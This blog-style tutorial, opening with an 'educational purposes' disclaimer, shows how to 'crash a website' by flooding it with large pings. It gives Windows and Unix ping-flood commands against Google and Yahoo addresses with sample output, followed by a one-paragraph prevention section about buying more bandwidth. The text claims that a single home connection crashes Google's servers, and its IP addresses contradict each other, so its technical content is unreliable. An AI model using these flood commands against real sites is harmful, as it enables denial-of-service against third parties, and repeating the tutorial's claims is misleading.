First I will say this. Do not do this to anyone’s website or server except your own. This can get you prison time. This is for educational purposes. I will show you how to crash a website then I will show you how to prevent such attacks.
The most common way to crash a website is by sending mass amounts of data to the server that it is stored on. This means instead of simply crashing a single site you may crash multiple sites. It all depends on how many websites are stored on the server for the particular IP Address.
I wrote in previous blogs how to setup a server to host a website. I also wrote how to setup a server to host multiple websites. Both of the blogs show you how to setup server with a single IP address. I would recommend reading those blogs and setting up your own server so you can do the attack that I’m going to be doing on this blog.
First of all no matter what computer your using, and no matter what Operating System you have. You should already have the tools that you need to do this. These tools are listed below.
- Any tool to find an IP Address of a website (Ping, Whois)
Now that you know the only two things that you will need lets get started. I will first show you how to achieve this with Windows.
In Windows you will simply fire up the command prompt. To do this their a several ways. But I will simply tell you the most universal way of doing it for Windows. Simply search for CMD or in older versions of windows use the RUN program and type CMD.
This should open up your command prompt window. This window allows you to type DOS commands into it. So now we will need to get the IP address of a website. PING can do this, or even a whois website. So lets use ping to obtain the IP Address of lets say Google. To do this we will type the following into our command prompt.
After typing in the above command and pressing Enter. You should get the following result.
Pinging google.com [220.127.116.11] with 32 bytes of data:
Reply from 18.104.22.168: bytes=32 time=56ms TTL=127
Reply from 22.214.171.124: bytes=32 time=25ms TTL=127
Reply from 126.96.36.199: bytes=32 time=27ms TTL=127
Reply from 188.8.131.52: bytes=32 time=47ms TTL=127
Ping statistics for 184.108.40.206:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 25ms, Maximum = 56ms, Average = 38ms
Great so now we know that Google’s IP Address is 220.127.116.11. But of course who really needed didn’t already know the IP Address of Google.
Now we will use Ping once again. However this time we will Ping the IP Address. so we will type the following.
ping 18.104.22.168 -t -l 65500
The above command will cause a continuing output of the following.
Pinging 22.214.171.124 with 65500 bytes of data:
Request timed out.
Request timed out.
It will continue to do this until the site crashes.
So what exactly did we do?
Well Ping is a tool that sends packets of data from your computer to another computer. In our case the computer we are pinging is Google’s Server.
So just typing the word ping followed by pressing Enter into the Windows command line will output the following.
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] target_name
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
What the above shows are instructions on using Ping. So we used the -t switch and the -l switch in our earlier command. So as the above results show us. What we did was we told ping to keep sending data to a certain computer until the computer that we are sending data to stops accepting data. That is why we used the -t switch. We also used the -l switch. By looking st our switch list we can see that the -l switch allows use to choose the size of data packet we will send to a computer.
So in my example I used -l 65500. This is because that was the most I could use on my test machine. If you have more internet you would use the biggest number you can use.
In short what we did was flood Google’s Servers with so much data that it ended up crashing. Of course we have to hope that the server we are attacking has less bandwidth then we do, or else we will end up crashing.
Now lets do the same thing in a Unix System.
To do this on a Unix system we will need to first use the -c switch. -c is the count switch. We use this because the defualt ping tool on Unix systems will keep ping infinitely if we don’t tell it when to stop. So we will type the following into the Terminal.
ping -c 4 yahoo.com
The above will output the following.
PING yahoo.com (126.96.36.199) 56(84) bytes of data.
64 bytes from ir2.fp.vip.bf1.yahoo.com (188.8.131.52): icmp_req=1 ttl=48 time=231 ms
64 bytes from ir2.fp.vip.bf1.yahoo.com (184.108.40.206): icmp_req=2 ttl=48 time=71.1 ms
64 bytes from ir2.fp.vip.bf1.yahoo.com (220.127.116.11): icmp_req=3 ttl=49 time=60.7 ms
64 bytes from ir2.fp.vip.bf1.yahoo.com (18.104.22.168): icmp_req=4 ttl=49 time=67.0 ms
--- yahoo.com ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 60.764/107.642/231.599/71.661 ms
So now we see that we sent out 64 bytes of data to yahoo.com 4 times. We also see that the IP Address of the Yahoo domain name is 22.214.171.124. So we will now do the following.
ping -s 65500 126.96.36.199
The above will give an output until the target computer has shutdown. The output will look like the following.
PING 188.8.131.52 (184.108.40.206) 65500(65528) bytes of data.
65508 bytes from 220.127.116.11: icmp_req=1 ttl=53 time=389 ms
65508 bytes from 18.104.22.168: icmp_req=2 ttl=53 time=390 ms
65508 bytes from 22.214.171.124: icmp_req=3 ttl=53 time=405 ms
65508 bytes from 126.96.36.199: icmp_req=4 ttl=53 time=350 ms
65508 bytes from 188.8.131.52: icmp_req=5 ttl=53 time=370 ms
65508 bytes from 184.108.40.206: icmp_req=6 ttl=53 time=387 ms
65508 bytes from 220.127.116.11: icmp_req=7 ttl=53 time=379 ms
65508 bytes from 18.104.22.168: icmp_req=8 ttl=53 time=389 ms
65508 bytes from 22.214.171.124: icmp_req=9 ttl=53 time=367 ms
65508 bytes from 126.96.36.199: icmp_req=10 ttl=53 time=385 ms
65508 bytes from 188.8.131.52: icmp_req=11 ttl=53 time=362 ms
Preventing The Attack
So how do we protect our servers from such an attack. Well it’s extremely simple. However for hobbyist who don’t have a lot of money and who are using someones ISP company to get internet access it can be kind of pricey. What we need to do is give our servers more bandwidth then an average computer user would have. Either way you’ll never have to much bandwidth. The more bandwidth you have the faster your site will be on the web. Plus it gives you more of a cushion for such attacks that I showed you in this blog. The method of getting more bandwidth is common method that all major companies use to prevent against such attacks. So in theory if you got more bandwidth then your victim has you will still be able to attack your victim.